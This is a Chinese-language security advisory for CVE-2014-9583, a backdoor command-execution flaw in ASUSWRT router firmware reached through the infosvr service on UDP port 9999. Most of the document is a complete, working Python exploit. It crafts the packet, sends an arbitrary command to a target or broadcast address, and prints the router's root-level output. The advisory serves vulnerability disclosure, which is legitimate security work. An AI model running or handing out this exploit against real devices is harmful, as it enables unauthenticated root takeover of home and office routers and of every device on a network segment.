ASUSWRT 3.0.0.4.376_1071 LAN后门命令执行漏洞
CVE-ID:CVE-2014-9583
发布日期：2015-01-08
更新日期：2015-01-12
受影响系统：
Asus ASUSWRT 3.0.0.4.376_1071
Asus ASUSWRT 3.0.0.376.2524-g0013f52
详细信息：

ASUSWRT是ASUS路由器固件。

 

ASUS WRT 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52版本中，infosvr的common.c没有正确检查请求的MAC地址，这可使远程攻击者通过向UDP端口9999，发送NET_CMD_ID_MANU_CMD数据包，利用此漏洞绕过身份验证并执行任意命令。受影响固件版本用在RT-AC66U, RT-N66U等其他路由器中。

来源：
Friedrich Postelstorfer
测试方法：
警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/usr/bin/env python3

 

# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution

# Date: 2014-10-11

# Vendor Homepage: http://www.asus.com/

# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip

# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip

# Tested Version: 3.0.0.4.376_1071-g8696125

# Tested Device: RT-N66U

 

# Description:

# A service called "infosvr" listens on port 9999 on the LAN bridge.

# Normally this service is used for device discovery using the

# "ASUS Wireless Router Device Discovery Utility", but this service contains a

# feature that allows an unauthenticated user on the LAN to execute commands

# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.

# "iboxcom.h" is in asuswrt/release/src/router/shared.

#

# Affected devices may also include wireless repeaters and other networking

# products, especially the ones which have "Device Discovery" in their features

# list.

#

# Using broadcast address as the IP address should work and execute the command

# on all devices in the network segment, but only receiving one response is

# supported by this script.

 

import sys, os, socket, struct

 

 

PORT = 9999

 

if len(sys.argv) < 3:

print(\'Usage: \' + sys.argv[0] + \' <ip> <command>\', file=sys.stderr)

sys.exit(1)

 

 

ip = sys.argv[1]

cmd = sys.argv[2]

 

enccmd = cmd.encode()

 

if len(enccmd) > 237:

# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.

print(\'Values over 237 will give rise to undefined behaviour.\', file=sys.stderr)

sys.exit(1)

 

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

sock.bind((\'0.0.0.0\', PORT))

sock.settimeout(2)

 

# Request consists of following things

# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

# PacketType [byte] ; NET_PACKET_TYPE_CMD

# OpCode [word] ; NET_CMD_ID_MANU_CMD

# Info [dword] ; Comment: "Or Transaction ID"

# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp

# Password [byte[32]] ; Not checked at all

# Length [word]

# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

 

packet = (b\'\\x0C\\x15\\x33\\x00\' + os.urandom(4) + (b\'\\x00\' * 38) + struct.pack(\'<H\', len(enccmd)) + enccmd).ljust(512, b\'\\x00\')

 

sock.sendto(packet, (ip, PORT))

 

 

# Response consists of following things

# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

# PacketType [byte] ; NET_PACKET_TYPE_RES

# OpCode [word] ; NET_CMD_ID_MANU_CMD

# Info [dword] ; Equal to Info of request

# MacAddress [byte[6]] ; Filled in for us

# Length [word]

# Result [byte[420]] ; Actually returns that amount

 

while True:

data, addr = sock.recvfrom(512)

 

if len(data) == 512 and data[1] == 22:

break

 

length = struct.unpack(\'<H\', data[14:16])[0]

s = slice(16, 16+length)

sys.stdout.buffer.write(data[s])

 

sock.close()
解决办法：
厂商补丁：

Asus
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip